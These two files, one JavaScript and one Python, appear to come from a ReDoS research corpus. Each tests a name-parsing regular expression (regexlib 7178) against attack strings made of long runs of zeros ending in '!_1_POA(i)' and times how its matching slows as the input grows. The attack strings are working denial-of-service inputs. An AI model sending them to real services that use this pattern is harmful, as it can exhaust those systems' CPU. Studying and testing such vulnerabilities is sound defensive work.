File: regexlib/javascript_test_file/regexlib_7178.js
/* 7178
 * (^\s*((?!st\.?\s+)\w+\S*)\s+((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+[^, ]*)(?:(,| ))*\s+(\w+\S*)\s*$)|(^\s*((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+\S*)\s+((jr)|(sr)|(ii)|(iii)||(iv)|(v)|(vi)|(vii)|(viii))\s*$)|(^\s*((?!st\.?\s+)\w+\S*)\s+((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+\S*)\s*$)|(^\s*((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+\S*)\s*$)|(^\s*((st\.?\s+)?\w+\S*)\s*$)
 * POLYNOMIAL
 * nums:3
 * POLYNOMIAL AttackString:"1 1 "+"0"*5000+"!_1_POA(i)"
 */
var REGEX = /(^\s*((?!st\.?\s+)\w+\S*)\s+((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+[^, ]*)(?:(,| ))*\s+(\w+\S*)\s*$)|(^\s*((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+\S*)\s+((jr)|(sr)|(ii)|(iii)||(iv)|(v)|(vi)|(vii)|(viii))\s*$)|(^\s*((?!st\.?\s+)\w+\S*)\s+((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+\S*)\s*$)|(^\s*((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+\S*)\s*$)|(^\s*((st\.?\s+)?\w+\S*)\s*$)/
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = '1 1 ' + '0'.repeat(i*10000) + '!_1_POA(i)'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 10000 + ": " + time_cost+" ms")
}

File: regexlib/2021-5-15/python_re_test_file/regexlib_7178.py
# 7178
# (^\s*((?!st\.?\s+)\w+\S*)\s+((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+[^, ]*)(?:(,| ))*\s+(\w+\S*)\s*$)|(^\s*((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+\S*)\s+((jr)|(sr)|(ii)|(iii)||(iv)|(v)|(vi)|(vii)|(viii))\s*$)|(^\s*((?!st\.?\s+)\w+\S*)\s+((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+\S*)\s*$)|(^\s*((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+\S*)\s*$)|(^\s*((st\.?\s+)?\w+\S*)\s*$)
# POLYNOMIAL
# nums:4
# POLYNOMIAL AttackString:"1 "+"0"*5000+"!_1_POA(i)"

import re
from time import perf_counter

regex = """(^\s*((?!st\.?\s+)\w+\S*)\s+((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+[^, ]*)(?:(,| ))*\s+(\w+\S*)\s*$)|(^\s*((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+\S*)\s+((jr)|(sr)|(ii)|(iii)||(iv)|(v)|(vi)|(vii)|(viii))\s*$)|(^\s*((?!st\.?\s+)\w+\S*)\s+((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+\S*)\s*$)|(^\s*((?!st\.?\s+)\w+\S*)\s+((st\.?\s+)?\w+\S*)\s*$)|(^\s*((st\.?\s+)?\w+\S*)\s*$)"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = "1 " + "0" * i * 10000 + "!_1_POA(i)"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *10000}: took {DURATION} seconds!")